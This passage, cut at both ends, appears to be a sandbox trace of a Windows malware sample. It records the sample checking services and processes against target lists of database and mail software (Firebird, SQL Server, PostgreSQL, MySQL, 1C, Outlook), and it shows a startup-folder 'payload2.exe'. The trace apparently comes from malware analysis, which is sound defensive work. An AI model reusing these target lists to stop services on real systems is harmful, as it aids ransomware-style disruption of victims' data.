lpString2="SamSs") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0048.559] lstrlenW (lpString="Schedule") returned 8 [0048.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0048.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0048.559] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0048.559] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0048.559] lstrlenW (lpString="SENS") returned 4 [0048.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0048.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0048.559] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0048.559] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0048.559] lstrlenW (lpString="ShellHWDetection") returned 16 [0048.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0048.559] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0048.559] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0048.559] lstrlenW (lpString="Spooler") returned 7 [0048.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0048.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0048.559] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0048.559] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0048.559] lstrlenW (lpString="swprv") returned 5 [0048.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0048.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0048.559] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0048.559] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0048.559] lstrlenW (lpString="SysMain") returned 7 [0048.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0048.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0048.559] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0048.559] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0048.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0048.559] lstrlenW (lpString="Themes") returned 6 [0048.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0048.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0048.560] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0048.560] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0048.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0048.560] lstrlenW (lpString="TrkWks") returned 6 [0048.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0048.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0048.560] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0048.560] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0048.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0048.560] lstrlenW (lpString="UxSms") returned 5 [0048.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0048.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0048.560] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0048.560] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0048.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0048.560] lstrlenW (lpString="VSS") returned 3 [0048.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0048.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0048.560] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0048.560] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0048.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0048.560] lstrlenW (lpString="WdiServiceHost") returned 14 [0048.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0048.560] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0048.560] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0048.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0048.560] lstrlenW (lpString="WdiSystemHost") returned 13 [0048.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0048.560] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0048.560] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0048.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0048.560] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0048.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0048.561] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0048.561] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0048.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0048.561] lstrlenW (lpString="Winmgmt") returned 7 [0048.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0048.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0048.561] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0048.561] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0048.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0048.561] lstrlenW (lpString="WPDBusEnum") returned 10 [0048.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0048.561] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0048.561] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0048.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0048.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0048.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0048.563] Process32FirstW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0048.563] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0048.564] lstrlenW (lpString="System") returned 6 [0048.564] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0048.564] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0048.564] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0048.564] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0048.564] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0048.564] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0048.564] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0048.564] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0048.565] lstrlenW (lpString="smss.exe") returned 8 [0048.565] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0048.565] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.565] lstrlenW (lpString="csrss.exe") returned 9 [0048.565] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0048.565] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0048.566] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0048.566] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0048.566] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0048.566] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0048.566] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0048.566] lstrlenW (lpString="wininit.exe") returned 11 [0048.566] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0048.566] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0048.566] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0048.566] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0048.567] lstrlenW (lpString="csrss.exe") returned 9 [0048.567] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0048.568] lstrlenW (lpString="winlogon.exe") returned 12 [0048.568] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0048.568] lstrlenW (lpString="services.exe") returned 12 [0048.568] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0048.569] lstrlenW (lpString="lsass.exe") returned 9 [0048.569] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0048.569] lstrlenW (lpString="lsm.exe") returned 7 [0048.569] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.570] lstrlenW (lpString="svchost.exe") returned 11 [0048.570] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.571] lstrlenW (lpString="svchost.exe") returned 11 [0048.571] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.571] lstrlenW (lpString="svchost.exe") returned 11 [0048.571] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.572] lstrlenW (lpString="svchost.exe") returned 11 [0048.572] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.573] lstrlenW (lpString="svchost.exe") returned 11 [0048.573] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0048.573] lstrlenW (lpString="audiodg.exe") returned 11 [0048.573] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.574] lstrlenW (lpString="svchost.exe") returned 11 [0048.574] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.574] lstrlenW (lpString="svchost.exe") returned 11 [0048.574] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0048.575] lstrlenW (lpString="dwm.exe") returned 7 [0048.575] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0048.575] lstrlenW (lpString="explorer.exe") returned 12 [0048.576] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0048.576] lstrlenW (lpString="spoolsv.exe") returned 11 [0048.576] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.577] lstrlenW (lpString="taskhost.exe") returned 12 [0048.577] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.577] lstrlenW (lpString="svchost.exe") returned 11 [0048.577] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0048.578] lstrlenW (lpString="taskeng.exe") returned 11 [0048.578] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.579] lstrlenW (lpString="taskhost.exe") returned 12 [0048.579] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0048.579] lstrlenW (lpString="challenging.exe") returned 15 [0048.579] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0048.580] lstrlenW (lpString="pgp prix.exe") returned 12 [0048.580] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0048.580] lstrlenW (lpString="user-reno.exe") returned 13 [0048.580] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0048.581] lstrlenW (lpString="aggregate.exe") returned 13 [0048.581] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0048.582] lstrlenW (lpString="dressed.exe") returned 11 [0048.582] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0048.582] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0048.582] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0048.583] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0048.583] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0048.583] lstrlenW (lpString="developing.exe") returned 14 [0048.583] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0048.584] lstrlenW (lpString="supported.exe") returned 13 [0048.584] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0048.585] lstrlenW (lpString="girlstionselect.exe") returned 19 [0048.585] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0048.585] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0048.585] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0048.586] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0048.586] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0048.734] lstrlenW (lpString="eating.exe") returned 10 [0048.734] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0048.734] lstrlenW (lpString="nh_protected.exe") returned 16 [0048.734] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0048.735] lstrlenW (lpString="vulnerability.exe") returned 17 [0048.735] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0048.736] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0048.736] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0048.736] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0048.736] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0048.737] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0048.737] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0048.738] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0048.738] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.738] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0048.738] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0048.739] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0048.739] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, 